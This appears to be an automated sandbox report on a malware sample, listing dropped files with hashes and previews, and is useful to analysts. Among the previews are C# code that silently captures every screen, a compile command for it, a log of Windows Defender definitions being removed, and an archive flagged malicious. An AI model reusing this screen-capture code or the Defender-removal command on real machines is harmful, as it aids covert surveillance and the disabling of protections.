                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.e....9U.n....G.v...M..|=...WRwGG.D..MU...[....#..$!.7..../....../.. .PN>..o.w.Z..:..BoF<..o..{...<..j.s...q.....8g=lxh.3...?.......?=.".A..z.......S.wp...S.^.s....F..D...L.?....'.....{.....t...4=j'N..[.d.....Sj.sJ._.wOJ..x.$...;.W..#.W.d_.Cglc3M.KwL....N...;..$..m."..../..uF.>u.^...>y.}.w..q...w..}.....L..S .h<s....7....z.9.W.D....~1%......~>).......}q..^A..7.....C...xO.^......&..O..w.......5...D9Gs..s.....Xsa.uC......;........7..v..[~..o.q7.o.!..qW..r8...(.y.9gdo..jo..aGh..1^.q...z..m.o..H....Z......wtb..xch.>.q..P?jk..h..`...b.....Q1..?.G..=|[._.5d...j.mIc..w.1.....#w.Y1.'.Mb1..E^.......9..Socy.<.2..irn....q..l.Nl..;B....8......~.-.....S__...!.....![...sh.]b_[...5..h..?7b...c.'.Z[...\.1..+.X....g.^.`..u.8...zD.|dm.>....gN@}tC..G,.......Z....i....7B,.X.Y.k..9..5c.Y....{...P.?.1...A..C.....0...9#..'........5h..?....X......^>....j.|..17
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1004
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                                                                                                      MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                                                                                                      SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                                                                                                      SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                                                                                                      SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):607
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.331839308836444
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfuCx0WZEifuCL:V3ka6KOkqeFkOfuCxVEifuCL
                                                                                                                                                                                                                                                                                                                      MD5:4082306060CC76AA12D28AD98A1855B1
                                                                                                                                                                                                                                                                                                                      SHA1:C9BE416F1856542BC66A68840DDDD00EB3ECDE32
                                                                                                                                                                                                                                                                                                                      SHA-256:89ACAC885BBD396F5EBF9D7275DD3EB1D6D77633D303AF07484369E6F7EF9BFA
                                                                                                                                                                                                                                                                                                                      SHA-512:190FD2E7061E48CCB93279D97CAB36394DCFC41CDA0C0804AAF5287AE72AC866E3548954E3E25BB46EAF2AB7ABF8F6FAE610613E3747146B78B99756496818D0
                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.0.cs"
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):4096
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.1618447834248076
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:6J7oEAtf0KhzBU/pDf6mtJ+N07pW1ulHa3rq:XNz0pWmGOjlK
                                                                                                                                                                                                                                                                                                                      MD5:5FD91F4420F934B0D10B66EA3E8024CC
                                                                                                                                                                                                                                                                                                                      SHA1:D5E6D62746BB111F96CCDC9D72D545D3A5162365
                                                                                                                                                                                                                                                                                                                      SHA-256:952B103F8F977C29300750F517986459E1A78D43C90969ED84FC702F688AD4DC
                                                                                                                                                                                                                                                                                                                      SHA-512:8F794FA206AA1E4B26848957E286164B900EF0CEA4C3A32E97A44CACCFCD2F2705A5DF78B84C5FB28BE65DDFE675264B47C61F58D797C253EE8D65F16CC09F08
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;.#g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                      Size (bytes):1148
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.5013804524893155
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:24:KJfWId3ka6KOkqeFkOfuCxVEifuCKKax5DqBVKVrdFAMBJTH:uWkka6NkqeFkyrHEurKK2DcVKdBJj
                                                                                                                                                                                                                                                                                                                      MD5:4F6161A09B11C0F195426E93588E8643
                                                                                                                                                                                                                                                                                                                      SHA1:958F76434E9AD38327E39D54808B6DED70E3ACBE
                                                                                                                                                                                                                                                                                                                      SHA-256:78E076B615A5473B98A3BDE2407C886D1AED8F429CE763F3259399AC30ED7679
                                                                                                                                                                                                                                                                                                                      SHA-512:4A9B5A7DFAD869DC7330C5E719DF8BB520A3DA116FF842EDC30EA7A4EA6D4C98BC199FE68A06EC45E2A4D032B22C67EA7B2F93505AB16F3AE77551763EFDA8D5
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.1012067769574267
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryVak7YnqqJPN5Dlq5J:+RI+ycuZhNHakSJPNnqX
                                                                                                                                                                                                                                                                                                                      MD5:7D3276E342467D00F840618AC3963B7D
                                                                                                                                                                                                                                                                                                                      SHA1:4C47931DA584C6CCAEC9B5850B02D28CF98FA92A
                                                                                                                                                                                                                                                                                                                      SHA-256:29884563D0102BC62BA05E113B9D71905139FBFC926D1C8228EE094521ABFFD6
                                                                                                                                                                                                                                                                                                                      SHA-512:D075CF2FDF4A9302DF9795687ED090D9D4A87B48748D4C26C2CDB6D406099433F21F1A1C365436C30A9FF50B847958C8268821E1EEAFB204BDCB8FFCC4390EDC
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.m.v.l.j.v.u.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.m.v.l.j.v.u.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe
                                                                                                                                                                                                                                                                                                                      File Type:RAR archive data, v5
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):386142
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999581261970029
                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:XbLSLQCeZHOYWJWxdNqOFFQOLcBka6wddxTnhni19sploKlRGAZqAmu4wCn1WrC1:rmLQC9YZNqO0OwBrNdRnhec5GAZqT3nR
                                                                                                                                                                                                                                                                                                                      MD5:2F45DD3873E02ED6B5DA3971C7D56F20
                                                                                                                                                                                                                                                                                                                      SHA1:0885DE89B432F632EC4485A10E24F7229FCDE0D7
                                                                                                                                                                                                                                                                                                                      SHA-256:8A47DDF65FC2E7439D8ABBAE0BD806326BAB4302FF66E361C65A3A927EFAD385
                                                                                                                                                                                                                                                                                                                      SHA-512:7D67DFC10347221563F14FE243BB700151C0E58CF7F630517959C88E0125A4B9A642AA14A6637E093549F3D3C613E926525CEC4BADA21A604EAF1482A3387CAA
                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:Rar!....p?..!.....RLfk...#c./..]..T....#..i}..wk..R!.....8.S...\./0|h_G;-n.....L#Y.o...I......V-)m*.....a.^..-y..,7!!.Q'...Z..t.1...T.%m.L$H......E...V`Y..b..Ty......`..3E......!G.V.C.m..#n'.wlx".y...#..1....M......i.~x.yM...1$R+....5..HZyz.+...i..|.t.:....T.L....j....kb..c..hfsR<..A......=_a.MJ.2G.......iAA..D.\q.8f1#.d4xars!7.Z.5..\.ofa.....t...N.W$.X...x.....MD..n..&..C..........c._|8...l.%.).m...p`......b.n.p.... .&.Me....lG.>U....I...,....B./8..Q.UcM....P..&.x{.F.q.z.^.@.X<Q.}Z..Q.j!...kI.........-.W.W....}?.(..L......L.^_z..T;.).?..u..w.ap...]...s~E............j+cJ..@s..WI....w..A...`.pJ....z........G....-x.....b.....@..`......Ie.....R]..#W.gK=.h.k....F...q...9A.}.FE..|.I_W.....H.~m,.v...|.{..m.t....L... *Y`.y........Jg......>....dc..6..f..6.4t.J..7.Q..o.....am'.FuO.%.Gg..E..i.R.o+.uP...0`n.;q...A. ..F...J.(..r..v..K_...N..>..n.l.m.~..6%".o.5..K.V..K........x.i$.2..e....?.$.....'cX..%.5C3!S..!q.WY...L....d......!H?. ....oz.......F
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                      Size (bytes):894
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.1313708833287466
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12:Q58KRBubdpkoPAGdjrwtxIRk9+MlWlLehW51ICJtxMQI:QOaqdmOFdjrwjIW+kWResLIojMt
                                                                                                                                                                                                                                                                                                                      MD5:ABC9C5EABEDC1A855A8A307CD62F6677
                                                                                                                                                                                                                                                                                                                      SHA1:C89AE0226766D8BA2AE305DF157B72F05F9FDE1D
                                                                                                                                                                                                                                                                                                                      SHA-256:97DED19E6520FE483C6D287F3790E426958F021540CD000E5E0758D907F0CDA5
                                                                                                                                                                                                                                                                                                                      SHA-512:97377938EAA849803D18DEBB1105D7FC613E2C27D88D56CB8C27F4FCDC2870A7BBB03E7AF5CE637938319916E19A0E6C5BBCF07BA2DBA7D4D8CC158BA2EA8475
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. O.c.t. .. 3.1. .. 2.0.2.4. .1.4.:.1.9.:.3.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. O.c.t. .. 3.1. .. 2.0.2.4. .1.4.:.1.9.:.3.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Oct 31 19:19:24 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1372
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.100532541584644
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:24:HYFq9HhfuF6kODfH1wK9Gof+XNWI+ycuZhNHakSJPNnqS+d:4aW6n2KD641ulHa3rqSe
                                                                                                                                                                                                                                                                                                                      MD5:04A39C03B5425E7D4AC01ACA980B3469
                                                                                                                                                                                                                                                                                                                      SHA1:C42D3E164C5BD461FB21B12E0F1844A2A55AFBA4
                                                                                                                                                                                                                                                                                                                      SHA-256:65B764770AF3BD40B36D87CA7299A13657480E9E46B5846499F0EFE57D168C5A
                                                                                                                                                                                                                                                                                                                      SHA-512:95E0616CEC72D8CDE36477DB068A7031B47ADFE81F98D9ADAD1F414E93B55D3F775BE8B8AFA80620B1829FF164A34F304DAED75972222FBD12C48EE702E2EEA1
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:L...<.#g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........R....c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP.................}2v.BF}..@a..;}..........4.......C:\Users\user\AppData\Local\Temp\RESD934.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.m.v.l.j.v.u.o...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):120400
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                                                                                                      MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                                                                                                      SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                                                                                                      SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                                                                                                      SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):49424
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.815740675307968
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
                                                                                                                                                                                                                                                                                                                      MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
                                                                                                                                                                                                                                                                                                                      SHA1:12CB7EC39F3AF0947000295F4B50CBD6E7436554
                                                                                                                                                                                                                                                                                                                      SHA-256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
                                                                                                                                                                                                                                                                                                                      SHA-512:AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):64272
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.834005148796091
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
                                                                                                                                                                                                                                                                                                                      MD5:79879C679A12FAC03F472463BB8CEFF7
                                                                                                                                                                                                                                                                                                                      SHA1:B530763123BD2C537313E5E41477B0ADC0DF3099
                                                                                                                                                                                                                                                                                                                      SHA-256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
                                                                                                                                                                                                                                                                                                                      SHA-512:CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):120080
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.901857200989369
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
                                                                                                                                                                                                                                                                                                                      MD5:21D27C95493C701DFF0206FF5F03941D
                                                                                                                                                                                                                                                                                                                      SHA1:F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
                                                                                                                                                                                                                                                                                                                      SHA-256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
                                                                                                                                                                                                                                                                                                                      SHA-512:A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):36112
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.6548425105220375
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
                                                                                                                                                                                                                                                                                                                      MD5:D6F123C4453230743ADCC06211236BC0
                                                                                                                                                                                                                                                                                                                      SHA1:9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
                                                                                                                                                                                                                                                                                                                      SHA-256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
                                                                                                                                                                                                                                                                                                                      SHA-512:F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
